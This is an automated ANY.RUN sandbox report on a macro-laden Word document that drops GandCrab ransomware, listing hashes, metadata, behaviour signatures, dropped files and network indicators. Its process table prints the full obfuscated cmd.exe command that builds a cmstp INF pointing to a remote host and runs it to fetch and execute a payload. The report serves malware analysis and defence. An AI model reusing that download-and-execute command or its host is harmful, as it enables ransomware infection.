analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

7e2d088e4950e867e875c547206795683070fa25e8c90ad301d3763b02a252a2

Full analysis: https://app.any.run/tasks/1bfc3d25-efc0-40c4-97df-530380cd74a0
Verdict: Malicious activity
Threats:

GandCrab is probably one of the most famous Ransomware. A Ransomware is a malware that asks the victim to pay money in order to restore access to encrypted files. If the user does not cooperate the files are forever lost.

Analysis date: March 21, 2019, 21:20:47
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
trojan
squiblydoo
ransomware
gandcrab
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Admin, Template: Normal, Last Saved By: Admin, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 02:00, Create Time/Date: Thu Jan 31 14:52:00 2019, Last Saved Time/Date: Thu Mar 21 14:35:00 2019, Number of Pages: 1, Number of Words: 4, Number of Characters: 23, Security: 0
MD5:

B6A6641BAF74CFDC80F28F7EC2B56347

SHA1:

AEA672AF6D6E1CDB20F1C7B281D53DB506200559

SHA256:

7E2D088E4950E867E875C547206795683070FA25E8C90AD301D3763B02A252A2

SSDEEP:

1536:3mMGHuJHHAShblIvD8P1aMxLm/4KnG0zFCFjkT2PXMdo0ZXEFN3FTHHG2bRBjD+w:3mmgKbS+1aMxLm/4KnqFNXM8VTHm2b/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 18434.exe (PID: 976)
    • SQUIBLYDOO was detected

      • cmstp.exe (PID: 3088)
    • Actions looks like stealing of personal data

      • 18434.exe (PID: 976)
    • Writes file to Word startup folder

      • 18434.exe (PID: 976)
    • Renames files like Ransomware

      • 18434.exe (PID: 976)
    • GANDCRAB detected

      • 18434.exe (PID: 976)
  • SUSPICIOUS

    • Creates files in the program directory

      • 18434.exe (PID: 976)
    • Executable content was dropped or overwritten

      • cmstp.exe (PID: 3088)
    • Creates files in the user directory

      • cmstp.exe (PID: 3088)
      • cmd.exe (PID: 1516)
      • 18434.exe (PID: 976)
    • Reads the cookies of Mozilla Firefox

      • 18434.exe (PID: 976)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1052)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 1052)
    • Dropped object may contain TOR URL's

      • 18434.exe (PID: 976)
    • Dropped object may contain Bitcoin addresses

      • 18434.exe (PID: 976)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: Admin
Keywords: -
Comments: -
Template: Normal
LastModifiedBy: Admin
RevisionNumber: 3
Software: Microsoft Office Word
TotalEditTime: 2.0 minutes
CreateDate: 2019:02:28 14:52:00
ModifyDate: 2019:03:21 14:35:00
Pages: 1
Words: 4
Characters: 23
Security: None
CodePage: Windows Latin 1 (Western European)
Company:
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 26
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
4
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs cmd.exe no specs #SQUIBLYDOO cmstp.exe #GANDCRAB 18434.exe

Process information

PID
CMD
Path
Indicators
Parent process
1052"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\7e2d088e4950e867e875c547206795683070fa25e8c90ad301d3763b02a252a2.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
1516cmd /V /C set "I8=s" && !I8!et "I53=\" && !I8!et "I2=e" && !I8!et "I5=i" && !I8!et "I96=A" && !I8!et "I6=N" && !I8!et "I89=d" && c!I96!ll !I8!et "I0=%!I96!PP!I89!!I96!T!I96!%" && c!I96!ll !I8!et "I31=%R!I96!!I6!!I89!OM%" && !I8!et "I81=!I0!!I53!M!I5!cro!I8!oft!I53!T!I2!mplat!I2!s!I53!!I31!.txt" && !I8!et "I07="^" && (For %i in ("[v!I2!r!I8!ion]" "!I8!ignatur!I2!=$Wi!I6!dow!I8! NTf7f81a39-5f63-5b42-9efd-1f13b5431005quot; "[D!I2!faultIn!I8!tall_Singl!I2!U!I8!er]" "UnR!I2!gi!I8!t!I2!rOCXs=I97" "[I97]" "%11%\%I7_1%%I7_2%%I7_3%,NI,%I_1%%I_2%%I_3%%I_4%%I_5%%I_6%%I_7%%I_8%%I_9%%I_10%%I_11%%I_12%%I_13%%I_14%" "[!I8!tring!I8!]" "I_1=ht" "I_2=tp" "I_3=:/" "I_4=/1" "I_5=34" "I_6=.2" "I_7=09" "I_8=.8" "I_9=8." "I_10=23" "I_11=/a" "I_12=sd" "I_13=.t" "I_14=xt" "I7_2=rO" "I7_1=sC" "I7_3=bJ" ) do @echo %~i)>"!I81!" && echo !I8!erv!I5!ceNam!I2!=!I07! !I07!>>!I81! && echo !I8!hortSvcN!I96!me=!I07! !I07!>>!I81! && c!I96!ll !I8!et "I28=%WI!I6!!I89!IR%" && !I8!t!I96!rt "" !I28!!I53!Sy!I8!t!I2!m32!I53!cm!I8!tp.!I2!x!I2! /s /ns "!I81!"C:\Windows\system32\cmd.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3088C:\Windows\System32\cmstp.exe /s /ns "C:\Users\admin\AppData\Roaming\Microsoft\Templates\15238.txt"C:\Windows\System32\cmstp.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Connection Manager Profile Installer
Exit code:
0
Version:
7.02.7600.16385 (win7_rtm.090713-1255)
976"C:\Users\admin\AppData\Roaming\Microsoft\18434.exe" C:\Users\admin\AppData\Roaming\Microsoft\18434.exe
cmstp.exe
User:
admin
Integrity Level:
MEDIUM
Total events
1 476
Read events
1 111
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
145
Text files
134
Unknown types
9

Dropped files

PID
Process
Filename
Type
1052WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9D50.tmp.cvr
MD5:
SHA256:
1052WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF39F85804F00AB1CB.TMP
MD5:
SHA256:
97618434.exeC:\PHDGHXIA-MANUAL.txttext
MD5:3C366E8D9CC37AB7E954CFC80153DF1F
SHA256:AB8AA1F17A330950C26F4D1955E34F6FD18CBBAFA412EF1DCD56B6C4CF596E41
1052WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7B1485E0.wmfwmf
MD5:9B958D431B80584579043950B6329CC2
SHA256:0C014D127F39FDEEDFA2229D89442011E65B0B09A38F748231D64FCE5E29224E
97618434.exeC:\$Recycle.Bin\S-1-5-21-1302019708-1500728564-335382590-1000\PHDGHXIA-MANUAL.txttext
MD5:3C366E8D9CC37AB7E954CFC80153DF1F
SHA256:AB8AA1F17A330950C26F4D1955E34F6FD18CBBAFA412EF1DCD56B6C4CF596E41
1516cmd.exeC:\Users\admin\AppData\Roaming\Microsoft\Templates\15238.txtini
MD5:103DF9576F8301B28300F327F562B60C
SHA256:59FF20A77888D1A77D44A6F1BB22833463B2EEFE0A66C6935D4E40A108938145
97618434.exeC:\Users\PHDGHXIA-MANUAL.txttext
MD5:3C366E8D9CC37AB7E954CFC80153DF1F
SHA256:AB8AA1F17A330950C26F4D1955E34F6FD18CBBAFA412EF1DCD56B6C4CF596E41
97618434.exeC:\MSOCache\PHDGHXIA-MANUAL.txttext
MD5:3C366E8D9CC37AB7E954CFC80153DF1F
SHA256:AB8AA1F17A330950C26F4D1955E34F6FD18CBBAFA412EF1DCD56B6C4CF596E41
97618434.exeC:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\boot.sdi
MD5:
SHA256:
97618434.exeC:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\Winre.wim
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3088
cmstp.exe
GET
200
134.209.88.23:80
http://134.209.88.23/asd.txt
US
xml
280 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3088
cmstp.exe
134.209.88.23:80
US
malicious

DNS requests

No data

Threats

PID
Process
Class
Message
3088
cmstp.exe
A Network Trojan was detected
MALWARE [PTsecurity] Squiblydoo Scriptlet
1 ETPRO signatures available at the full report
No debug info